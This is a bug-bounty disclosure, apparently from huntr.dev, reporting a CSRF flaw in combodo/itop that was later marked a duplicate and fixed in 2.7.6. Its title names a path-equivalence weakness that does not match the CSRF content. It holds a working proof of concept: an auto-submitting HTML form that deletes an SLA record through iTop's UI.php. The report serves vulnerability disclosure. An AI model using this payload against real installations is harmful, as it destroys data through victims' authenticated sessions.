Improper Resolution of Path Equivalence in combodo/itop
Valid
Reported on
Nov 24th 2021
Description
csrf bug
Proof of Concept
bellow request is vulnerable to csrf attack
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8008/web/pages/UI.php?operation=delete&class=SLA&id=1&c[menu]=SLA" method="POST">
<input type="hidden" name="transaction_id" value="admE469.tmp" />
<input type="hidden" name="operation" value="bulk_delete_confirmed" />
<input type="hidden" name="filter" value="%5B%22SELECT+%60SLA%60+FROM+SLA+AS+%60SLA%60+WHERE+%28%60SLA%60.%60id%60+IN+%28%271%27%29%29%22%2C%5B%5D%2C%5B%5D%5D" />
<input type="hidden" name="class" value="SLA" />
<input type="hidden" name="selectObject[]" value="1" />
<input type="hidden" name="c[menu]" value="SLA" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
We are processing your report and will contact the
combodo/itop
team within 24 hours.
2 years ago
This is a duplicate of https://huntr.dev/bounties/0a39630d-f4b9-4468-86d8-aea3b02f91ae/?token=4d1195d5a50a9f0f7ae9fc24a2b0a3bd907427edaf7ee6ac1f8f31c11d8b7a5d2c204957125e63fd7cf3a87df6d5d12a35f9c7107ba5f33b5f668fa199a36932448b9bf186daa62cb32b5635770730eb68eeeba079b8864ab00358fd0dc65fa406d986525814a14951db2025e117f0098a1f270f5a5b2c935a65b00b5106e5511b61d501c4357654cb8ea76b
Was fixed in 2.7.6 Corresponding GitHub advisory : https://github.com/Combodo/iTop/security/advisories/GHSA-33pr-5776-9jqf
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation